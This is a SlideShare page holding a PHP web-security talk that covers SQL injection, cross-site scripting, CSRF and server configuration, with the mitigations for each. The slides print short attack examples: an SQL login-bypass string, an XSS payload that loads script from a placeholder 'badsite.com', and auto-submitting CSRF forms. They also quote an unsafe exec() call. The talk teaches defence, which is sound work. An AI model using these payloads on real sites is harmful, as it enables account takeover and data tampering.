SlideShare a Scribd company logo

PHPUG Presentation

D
Damon Cortesi

This document summarizes common web application vulnerabilities like SQL injection and cross-site scripting (XSS) for PHP applications. It provides examples of each vulnerability and discusses mitigation strategies like input sanitization, encoding output, and using security frameworks. It also covers other risks like cross-site request forgery (CSRF) and the importance of secure server configurations.

1 of 27
Securing PHP Web Applications Web Applications Damon P. Cortesi, CISSP Directory @ Alchemy Security Stats Nut | Security Geek | Builder of Tools
$ whoami Security Consultant Part-time Web Dev (PHP, Django, Rails) Destroyer of Web Apps and Dual-Cores
<?=presoinfo();?> Typical web application vulnerabilities SQL Injection Cross-Site Scripting What to watch out for How to secure your PHP apps
SQL Injection $sql = “SELECT * FROM users WHERE username = ‘“ . $_POST[‘username’] . “‘ AND password = ‘“ . $_POST[‘password’] . “‘“; What if username is: “dpc’ or ‘a’=’a” ? ... username = ‘ dpc’ or ‘a’=’a ‘ ...
http://www.flickr.com/photos/tekalpha/94105897/
SQL Injection Username: dpc SELECT * FROM users WHERE username = ‘dpc‘ AND password = ‘apassword’; Username: dpc’ OR ‘A’=’A SELECT * FROM users WHERE username = ‘dpc ’ OR ‘A’=’A ‘ AND password = ‘apassword’;
Cross-Site Scripting User input re-displayed in browser and interpreted as HTML or ... JavaScript My name is Damon”><script>alert(‘hi’)</script> Why is this bad? Phishing Cookie stealing Arbitrary JavaScript execution...
XSS Example Ability to spoof an entire site by including JavaScript from elsewhere http://realsite.com/projects/search?q=test ”><script src=” http://badsite.com/evilphishingpage.js ”></script>... JavaScript can rewrite any DOM element...
Real-world Dangers We live in an interactive web
So what? I run a blog ... XSS me all day long ... I DON’T CARE! Fair enough. Importance of security is directly proportional to level of risk. Blog != Payment Gateway.
Coder for Hire? Are you willing to put your company reputation at stake? What type of apps are you building? Where _might_ your code be used? Themes? Plugins? include(‘wp_story’);
Common Mitigations “Increase your security by 80%, by fixing 20% of the problems.” Input Sanitization and Validation Data Encoding and Escaping
Sanitization/Encoding SQL: mysql_real_escape_string() HTML/XSS: htmlentities() “ <b>Damon</b> >> &quot;&lt;b&gt;Damon&lt;/b&gt; Beware encoding
Input Sanitization Fail exec(mysql_escape_string($_GET[‘var’])) Problem #1: mysql_escape_string is deprecated. Problem #2: MySQL escape does not make it safe for exec(). ?? preg_match(&quot;/.jpe?g$/i&quot;, $var) exec ( &quot;convert '&quot; . mysql_escape_string ( $path ) . &quot;' /tmp/'&quot; . mysql_escape_string ( basename ( $path )). &quot;'.png&quot; );
Better? Instead of dynamically constructing SQL queries...use a framework. CodeIgniter, CakePHP, Zend Or build a db.inc.php (but not a db.inc). Use an output library that automatically escapes.
Server-Side Checks Client-side code can be modified HTTP Proxies Toolbars Super-hack “save to disk” & modify Validate all user input with server-side code
Bug Hunting Data Inputs $_GET, $_POST, $_REQUEST $_SERVER[‘QUERY_STRING’] $_SERVER[‘PHP_SELF’] $_COOKIE Shell commands: exec()
Cross-Site Request Forgery Let’s Google for “javascript are you sure?” First result (circa 2006) is susceptible to CSRF (and probably SQL Injection). What is this CSRF?
GET CSRF delete.php?id=123 An action that modifies data called via HTTP GET (against HTTP specs). <img src=” http://x.com/delete.php?id=123” />
POST CSRF Only difference: JavaScript required to automate attack. <form name=”csrf” action=” http://x.com/delete.php ” method=”POST”> <input type=”hidden” name=”id” value=”123”> </form> <script>document.csrf.submit()</script>
CSRF in Action
Fixing CSRF Do not modify data using GET Use tokens on all form POSTs per-session per-form Up to you - convenience vs. security
Other Protections Secure Cookie Flag Restricts transmission of cookies set via HTTPS HTTPOnly Cookie Flag Can’t be accessed using <script> Use innerText, not innerHTML
3rd Party Plugins Need a plugin or specific function? Google. Download. Hackhack. It works! Is that code secure? (See prev. CSRF)
Server Config Not always some über-technical sploit... /phpMyAdmin unprotected? demo/demo password Email on confirmation page
Location: $references Chris Shiflett: http://shiflett.org / Essential PHP Security PHP Manual: http://www.php.net/manual/en/security.php Disable register_globals Disabled by default in PHP > 4.2.0 http://www.owasp.org/index.php/PHP_Top_5 http://startupsecurity.info
Thanks [email_address] http://xkcd.com/327/

Recommended

Djangoアプリのデプロイに関するプラクティス / Deploy django application
Djangoアプリのデプロイに関するプラクティス / Deploy django applicationDjangoアプリのデプロイに関するプラクティス / Deploy django application
Djangoアプリのデプロイに関するプラクティス / Deploy django application
Masashi Shibata
 
Api
ApiApi
Api
randyhoyt
 
Django の認証処理実装パターン / Django Authentication Patterns
Django の認証処理実装パターン / Django Authentication PatternsDjango の認証処理実装パターン / Django Authentication Patterns
Django の認証処理実装パターン / Django Authentication Patterns
Masashi Shibata
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
Eoin Keary
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
Jason Harwig
 
JSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedJSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons Learned
Kazuho Oku
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
Irfad Imtiaz
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIs
randyhoyt
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
Simon Willison
 
JSConf Asia: Node.js Authentication and Data Security
JSConf Asia: Node.js Authentication and Data SecurityJSConf Asia: Node.js Authentication and Data Security
JSConf Asia: Node.js Authentication and Data Security
Tim Messerschmidt
 
Authentication in Node.js
Authentication in Node.jsAuthentication in Node.js
Authentication in Node.js
Jason Pearson
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers Group
Adam Caudill
 
Integrating External APIs with WordPress
Integrating External APIs with WordPressIntegrating External APIs with WordPress
Integrating External APIs with WordPress
Marty Thornley
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
Avădănei Andrei
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0
robwinch
 
Fav
FavFav
Fav
helloppt
 
Mozilla Web Apps - Super-VanJS
Mozilla Web Apps - Super-VanJSMozilla Web Apps - Super-VanJS
Mozilla Web Apps - Super-VanJS
Robert Nyman
 
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
Antonio Sanso
 
PHP Security
PHP SecurityPHP Security
PHP Security
Mindfire Solutions
 
Node.js Authentication & Data Security
Node.js Authentication & Data SecurityNode.js Authentication & Data Security
Node.js Authentication & Data Security
Tim Messerschmidt
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
Michael Hendrickx
 
Repaso rápido a los nuevos estándares web
Repaso rápido a los nuevos estándares webRepaso rápido a los nuevos estándares web
Repaso rápido a los nuevos estándares web
Pablo Garaizar
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Carol McDonald
 
Securing WordPress
Securing WordPressSecuring WordPress
Securing WordPress
Shawn Hooper
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the Web
Mike Crabb
 
Secure Coding with WordPress - WordCamp SF 2008
Secure Coding with WordPress - WordCamp SF 2008Secure Coding with WordPress - WordCamp SF 2008
Secure Coding with WordPress - WordCamp SF 2008
Mark Jaquith
 
Website Security
Website SecurityWebsite Security
Website Security
MODxpo
 
PRESENTACION VALLE DE TENA
PRESENTACION VALLE DE TENAPRESENTACION VALLE DE TENA
PRESENTACION VALLE DE TENA
Hotel Privilegio
 
PARABÉNS TFUFP!!!
PARABÉNS TFUFP!!!PARABÉNS TFUFP!!!
PARABÉNS TFUFP!!!
mjoaocastro
 

More Related Content

What's hot (20)

When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
Simon Willison
 
JSConf Asia: Node.js Authentication and Data Security
JSConf Asia: Node.js Authentication and Data SecurityJSConf Asia: Node.js Authentication and Data Security
JSConf Asia: Node.js Authentication and Data Security
Tim Messerschmidt
 
Authentication in Node.js
Authentication in Node.jsAuthentication in Node.js
Authentication in Node.js
Jason Pearson
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers Group
Adam Caudill
 
Integrating External APIs with WordPress
Integrating External APIs with WordPressIntegrating External APIs with WordPress
Integrating External APIs with WordPress
Marty Thornley
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
Avădănei Andrei
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0
robwinch
 
Fav
FavFav
Fav
helloppt
 
Mozilla Web Apps - Super-VanJS
Mozilla Web Apps - Super-VanJSMozilla Web Apps - Super-VanJS
Mozilla Web Apps - Super-VanJS
Robert Nyman
 
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
Antonio Sanso
 
PHP Security
PHP SecurityPHP Security
PHP Security
Mindfire Solutions
 
Node.js Authentication & Data Security
Node.js Authentication & Data SecurityNode.js Authentication & Data Security
Node.js Authentication & Data Security
Tim Messerschmidt
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
Michael Hendrickx
 
Repaso rápido a los nuevos estándares web
Repaso rápido a los nuevos estándares webRepaso rápido a los nuevos estándares web
Repaso rápido a los nuevos estándares web
Pablo Garaizar
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Carol McDonald
 
Securing WordPress
Securing WordPressSecuring WordPress
Securing WordPress
Shawn Hooper
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the Web
Mike Crabb
 
Secure Coding with WordPress - WordCamp SF 2008
Secure Coding with WordPress - WordCamp SF 2008Secure Coding with WordPress - WordCamp SF 2008
Secure Coding with WordPress - WordCamp SF 2008
Mark Jaquith
 
Website Security
Website SecurityWebsite Security
Website Security
MODxpo
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
Simon Willison
 
JSConf Asia: Node.js Authentication and Data Security
JSConf Asia: Node.js Authentication and Data SecurityJSConf Asia: Node.js Authentication and Data Security
JSConf Asia: Node.js Authentication and Data Security
Tim Messerschmidt
 
Authentication in Node.js
Authentication in Node.jsAuthentication in Node.js
Authentication in Node.js
Jason Pearson
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers Group
Adam Caudill
 
Integrating External APIs with WordPress
Integrating External APIs with WordPressIntegrating External APIs with WordPress
Integrating External APIs with WordPress
Marty Thornley
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
Avădănei Andrei
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0
robwinch
 
Fav
FavFav
Fav
helloppt
 
Mozilla Web Apps - Super-VanJS
Mozilla Web Apps - Super-VanJSMozilla Web Apps - Super-VanJS
Mozilla Web Apps - Super-VanJS
Robert Nyman
 
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
Antonio Sanso
 
PHP Security
PHP SecurityPHP Security
PHP Security
Mindfire Solutions
 
Node.js Authentication & Data Security
Node.js Authentication & Data SecurityNode.js Authentication & Data Security
Node.js Authentication & Data Security
Tim Messerschmidt
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
Michael Hendrickx
 
Repaso rápido a los nuevos estándares web
Repaso rápido a los nuevos estándares webRepaso rápido a los nuevos estándares web
Repaso rápido a los nuevos estándares web
Pablo Garaizar
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Carol McDonald
 
Securing WordPress
Securing WordPressSecuring WordPress
Securing WordPress
Shawn Hooper
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the Web
Mike Crabb
 
Secure Coding with WordPress - WordCamp SF 2008
Secure Coding with WordPress - WordCamp SF 2008Secure Coding with WordPress - WordCamp SF 2008
Secure Coding with WordPress - WordCamp SF 2008
Mark Jaquith
 
Website Security
Website SecurityWebsite Security
Website Security
MODxpo
 

Viewers also liked (20)

PRESENTACION VALLE DE TENA
PRESENTACION VALLE DE TENAPRESENTACION VALLE DE TENA
PRESENTACION VALLE DE TENA
Hotel Privilegio
 
PARABÉNS TFUFP!!!
PARABÉNS TFUFP!!!PARABÉNS TFUFP!!!
PARABÉNS TFUFP!!!
mjoaocastro
 
seniorweb.ch - ein soziales Netzwerk
seniorweb.ch - ein soziales Netzwerkseniorweb.ch - ein soziales Netzwerk
seniorweb.ch - ein soziales Netzwerk
alfons buehlmann
 
Sony emcs-scholarship-2012
Sony emcs-scholarship-2012Sony emcs-scholarship-2012
Sony emcs-scholarship-2012
Eiyka Ahmad
 
Leistritz Key Seating Machines
Leistritz Key Seating MachinesLeistritz Key Seating Machines
Leistritz Key Seating Machines
TREVOR MOSS
 
Jens_CV_and_Reference_Letter_June 2016
Jens_CV_and_Reference_Letter_June 2016Jens_CV_and_Reference_Letter_June 2016
Jens_CV_and_Reference_Letter_June 2016
Jens Rune Brandal
 
ACCIONA Informa N. 59 - Noviembre 2014
ACCIONA Informa N. 59 - Noviembre 2014ACCIONA Informa N. 59 - Noviembre 2014
ACCIONA Informa N. 59 - Noviembre 2014
acciona
 
IV Foro TIC y Sostenibilidad: Futuro de la gestion RAEE de Colombia
IV Foro TIC y Sostenibilidad: Futuro de la gestion RAEE de ColombiaIV Foro TIC y Sostenibilidad: Futuro de la gestion RAEE de Colombia
IV Foro TIC y Sostenibilidad: Futuro de la gestion RAEE de Colombia
gaiasas
 
Sistemas de-comunicación-por-fibra
Sistemas de-comunicación-por-fibraSistemas de-comunicación-por-fibra
Sistemas de-comunicación-por-fibra
Darthuz Kilates
 
Global Dementia Legacy Event: Canada & France: Dr Etienne Hirsch & Dr Yves Jo...
Global Dementia Legacy Event: Canada & France: Dr Etienne Hirsch & Dr Yves Jo...Global Dementia Legacy Event: Canada & France: Dr Etienne Hirsch & Dr Yves Jo...
Global Dementia Legacy Event: Canada & France: Dr Etienne Hirsch & Dr Yves Jo...
Department of Health
 
Sanghaya inc
Sanghaya incSanghaya inc
Sanghaya inc
Birei Gonzales
 
Deportes Extremos
Deportes ExtremosDeportes Extremos
Deportes Extremos
ORLANDGOLD
 
Ecc report-cross-border-e-commerce en
Ecc report-cross-border-e-commerce enEcc report-cross-border-e-commerce en
Ecc report-cross-border-e-commerce en
Ana Smilović
 
newsasset Agency Edition
newsasset Agency Editionnewsasset Agency Edition
newsasset Agency Edition
Athens Technology Center
 
Edition 20 - Sharing in Petrobras - number 1/2006
Edition 20 - Sharing in Petrobras - number 1/2006Edition 20 - Sharing in Petrobras - number 1/2006
Edition 20 - Sharing in Petrobras - number 1/2006
Petrobras
 
COETUR 2014: Casos de éxito en la gestión de un alojamiento rural con Riojania
COETUR 2014: Casos de éxito en la gestión de un alojamiento rural con RiojaniaCOETUR 2014: Casos de éxito en la gestión de un alojamiento rural con Riojania
COETUR 2014: Casos de éxito en la gestión de un alojamiento rural con Riojania
EscapadaRural
 
IPKeysPP - WEEC Presentation 9.29.15
IPKeysPP - WEEC Presentation 9.29.15IPKeysPP - WEEC Presentation 9.29.15
IPKeysPP - WEEC Presentation 9.29.15
Laurie Wiegand-Jackson
 
Employee Benefits Guide 2017
Employee Benefits Guide 2017Employee Benefits Guide 2017
Employee Benefits Guide 2017
Alicia Holmes
 
Mapa parv relaciones_logico_matematicas_y_cuantificacion
Mapa parv relaciones_logico_matematicas_y_cuantificacionMapa parv relaciones_logico_matematicas_y_cuantificacion
Mapa parv relaciones_logico_matematicas_y_cuantificacion
Karin Arancibia Estay
 
Personal Finance for Engineers (LinkedIn 2014)
Personal Finance for Engineers (LinkedIn 2014)Personal Finance for Engineers (LinkedIn 2014)
Personal Finance for Engineers (LinkedIn 2014)
Adam Nash
 
PRESENTACION VALLE DE TENA
PRESENTACION VALLE DE TENAPRESENTACION VALLE DE TENA
PRESENTACION VALLE DE TENA
Hotel Privilegio
 
PARABÉNS TFUFP!!!
PARABÉNS TFUFP!!!PARABÉNS TFUFP!!!
PARABÉNS TFUFP!!!
mjoaocastro
 
seniorweb.ch - ein soziales Netzwerk
seniorweb.ch - ein soziales Netzwerkseniorweb.ch - ein soziales Netzwerk
seniorweb.ch - ein soziales Netzwerk
alfons buehlmann
 
Sony emcs-scholarship-2012
Sony emcs-scholarship-2012Sony emcs-scholarship-2012
Sony emcs-scholarship-2012
Eiyka Ahmad
 
Leistritz Key Seating Machines
Leistritz Key Seating MachinesLeistritz Key Seating Machines
Leistritz Key Seating Machines
TREVOR MOSS
 
Jens_CV_and_Reference_Letter_June 2016
Jens_CV_and_Reference_Letter_June 2016Jens_CV_and_Reference_Letter_June 2016
Jens_CV_and_Reference_Letter_June 2016
Jens Rune Brandal
 
ACCIONA Informa N. 59 - Noviembre 2014
ACCIONA Informa N. 59 - Noviembre 2014ACCIONA Informa N. 59 - Noviembre 2014
ACCIONA Informa N. 59 - Noviembre 2014
acciona
 
IV Foro TIC y Sostenibilidad: Futuro de la gestion RAEE de Colombia
IV Foro TIC y Sostenibilidad: Futuro de la gestion RAEE de ColombiaIV Foro TIC y Sostenibilidad: Futuro de la gestion RAEE de Colombia
IV Foro TIC y Sostenibilidad: Futuro de la gestion RAEE de Colombia
gaiasas
 
Sistemas de-comunicación-por-fibra
Sistemas de-comunicación-por-fibraSistemas de-comunicación-por-fibra
Sistemas de-comunicación-por-fibra
Darthuz Kilates
 
Global Dementia Legacy Event: Canada & France: Dr Etienne Hirsch & Dr Yves Jo...
Global Dementia Legacy Event: Canada & France: Dr Etienne Hirsch & Dr Yves Jo...Global Dementia Legacy Event: Canada & France: Dr Etienne Hirsch & Dr Yves Jo...
Global Dementia Legacy Event: Canada & France: Dr Etienne Hirsch & Dr Yves Jo...
Department of Health
 
Sanghaya inc
Sanghaya incSanghaya inc
Sanghaya inc
Birei Gonzales
 
Deportes Extremos
Deportes ExtremosDeportes Extremos
Deportes Extremos
ORLANDGOLD
 
Ecc report-cross-border-e-commerce en
Ecc report-cross-border-e-commerce enEcc report-cross-border-e-commerce en
Ecc report-cross-border-e-commerce en
Ana Smilović
 
newsasset Agency Edition
newsasset Agency Editionnewsasset Agency Edition
newsasset Agency Edition
Athens Technology Center
 
Edition 20 - Sharing in Petrobras - number 1/2006
Edition 20 - Sharing in Petrobras - number 1/2006Edition 20 - Sharing in Petrobras - number 1/2006
Edition 20 - Sharing in Petrobras - number 1/2006
Petrobras
 
COETUR 2014: Casos de éxito en la gestión de un alojamiento rural con Riojania
COETUR 2014: Casos de éxito en la gestión de un alojamiento rural con RiojaniaCOETUR 2014: Casos de éxito en la gestión de un alojamiento rural con Riojania
COETUR 2014: Casos de éxito en la gestión de un alojamiento rural con Riojania
EscapadaRural
 
IPKeysPP - WEEC Presentation 9.29.15
IPKeysPP - WEEC Presentation 9.29.15IPKeysPP - WEEC Presentation 9.29.15
IPKeysPP - WEEC Presentation 9.29.15
Laurie Wiegand-Jackson
 
Employee Benefits Guide 2017
Employee Benefits Guide 2017Employee Benefits Guide 2017
Employee Benefits Guide 2017
Alicia Holmes
 
Mapa parv relaciones_logico_matematicas_y_cuantificacion
Mapa parv relaciones_logico_matematicas_y_cuantificacionMapa parv relaciones_logico_matematicas_y_cuantificacion
Mapa parv relaciones_logico_matematicas_y_cuantificacion
Karin Arancibia Estay
 
Personal Finance for Engineers (LinkedIn 2014)
Personal Finance for Engineers (LinkedIn 2014)Personal Finance for Engineers (LinkedIn 2014)
Personal Finance for Engineers (LinkedIn 2014)
Adam Nash
 

Similar to PHPUG Presentation (20)

PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101
brian_dailey
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
Frank Kim
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
Joe Walker
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
Dave Ross
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
Erlend Oftedal
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
mirahman
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
Sastry Tumuluri
 
Building Secure Twitter Apps
Building Secure Twitter AppsBuilding Secure Twitter Apps
Building Secure Twitter Apps
Damon Cortesi
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
guestbd1cdca
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
jemond
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden
 
Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?
ConFoo
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
Michael Peters
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
testuser1223
 
Web Security
Web SecurityWeb Security
Web Security
Supankar Banik
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
Chris Shiflett
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101
brian_dailey
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
Frank Kim
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
Joe Walker
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
Dave Ross
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
Erlend Oftedal
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
mirahman
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
Sastry Tumuluri
 
Building Secure Twitter Apps
Building Secure Twitter AppsBuilding Secure Twitter Apps
Building Secure Twitter Apps
Damon Cortesi
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
guestbd1cdca
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
jemond
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden
 
Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?
ConFoo
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
Michael Peters
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
testuser1223
 
Web Security
Web SecurityWeb Security
Web Security
Supankar Banik
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
Chris Shiflett
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 

Recently uploaded (20)

Drupalcamp Finland – Measuring Front-end Energy Consumption
Drupalcamp Finland – Measuring Front-end Energy ConsumptionDrupalcamp Finland – Measuring Front-end Energy Consumption
Drupalcamp Finland – Measuring Front-end Energy Consumption
Exove
 
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdfThe Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
Abi john
 
Quantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur MorganQuantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur Morgan
Arthur Morgan
 
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdfComplete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Software Company
 
Linux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdfLinux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdf
RHCSA Guru
 
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
BookNet Canada
 
Cyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of securityCyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of security
riccardosl1
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
Semantic Cultivators : The Critical Future Role to Enable AI
Semantic Cultivators : The Critical Future Role to Enable AISemantic Cultivators : The Critical Future Role to Enable AI
Semantic Cultivators : The Critical Future Role to Enable AI
artmondano
 
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded DevelopersLinux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Toradex
 
Splunk Security Update | Public Sector Summit Germany 2025
Splunk Security Update | Public Sector Summit Germany 2025Splunk Security Update | Public Sector Summit Germany 2025
Splunk Security Update | Public Sector Summit Germany 2025
Splunk
 
